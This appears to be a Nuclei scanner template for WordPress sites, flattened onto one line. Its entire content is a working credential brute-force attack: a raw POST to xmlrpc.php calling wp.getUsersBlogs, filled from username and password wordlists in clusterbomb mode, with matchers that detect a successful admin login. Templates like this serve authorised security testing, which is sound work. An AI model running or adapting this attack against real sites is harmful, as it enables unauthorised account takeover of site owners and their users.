id: wordpress-xmlrpc-brute-force info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high description: This template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz requests: - raw: - | POST /xmlrpc.php HTTP/1.1 Host: {{Hostname}} Content-Length: 235 wp.getUsersBlogs {{username}} {{password}} attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - 'url' - 'xmlrpc' - 'isAdmin' condition: and